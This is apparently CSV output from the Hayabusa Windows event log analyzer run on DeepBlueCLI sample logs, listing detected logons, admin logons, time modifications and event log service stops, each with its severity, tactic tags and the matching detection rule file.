2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x19153,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x19153 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x1917f | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1917f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:52:14.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:54:22.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:55:00.775 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x2b15e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b15e | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b18a | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2b18a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:06:17.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:07:33.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x25519,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x25519 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2553c | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: cifs/rdavis-7.sharplogic.local,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x15f454,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.841 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x15f454,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f454,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\lsass.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x15f53a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24
06:53:46.669 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f546,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f53a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2553c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:54:10.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:29.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2013-10-24 06:55:35.625 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:35.625 
+09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xdad4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xdad4 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xdafc | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x13dbc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x13dbc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 
07:00:55.356 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xdafc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0xdafc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0xdad4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x4bafc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x4bafc | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x4bb14 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:04:16.809 
+09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x4bb14,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:04:18.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:25.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xd99e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xd99e | (Warning: Credentials are stored in 
memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xd9c6 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x144df,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x144df,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:29:47.424 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time 
Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x144df,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xd9c6,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:41:16.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:42:37.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-22 08:42:49.610 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time 
Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x16559,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x16559 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x16589 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x16589,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-22 10:43:32.000 +09:00,IE8Win7,6006,info,,Event Log Service 
Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-24 14:07:37.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x2b7c0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b7c0 | (Warning: Credentials are stored in 
memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b7f0 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: 
